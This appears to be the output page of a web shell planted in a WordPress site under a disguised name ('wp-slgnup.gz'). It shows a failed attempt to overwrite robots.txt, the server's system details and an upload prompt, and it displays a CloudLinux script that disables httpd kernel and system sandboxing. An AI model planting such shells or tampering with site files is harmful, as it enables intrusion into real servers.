Warning: file_put_contents(/home/allsupport/public_html/robots.txt): failed to open stream: Permission denied in /home/allsupport/public_html/wp-slgnup.gz on line 2
HEX
HEX
Server: Apache
System: Linux ws3.allsupport.co 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
User: allsupport (1013)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //usr/libexec/criu-lve/httpd-override
#!/usr/bin/bash
#
# Create httpd systemd override for CRIU compatibility.
# Called from criu.service ExecStartPre on first start.
# On CL10+ this relaxes sandboxing that blocks checkpoint/restore;
# on CL7-CL9 these directives are harmless no-ops (the defaults
# are already "no" when not set in the service file).
#

OVERRIDE_DIR="/etc/systemd/system/httpd.service.d"
OVERRIDE_FILE="${OVERRIDE_DIR}/cloudlinux-criu-override.conf"

if [ -f "$OVERRIDE_FILE" ]; then
    exit 0
fi

mkdir -p "$OVERRIDE_DIR"

cat > "$OVERRIDE_FILE" << 'EOF'
[Service]
# CRIU checkpoint/restore needs access to kernel module paths, kernel logs,
# kernel tunables, and writable system directories.
ProtectKernelModules=no
ProtectKernelLogs=no
ProtectKernelTunables=no
ProtectSystem=no
EOF

systemctl daemon-reload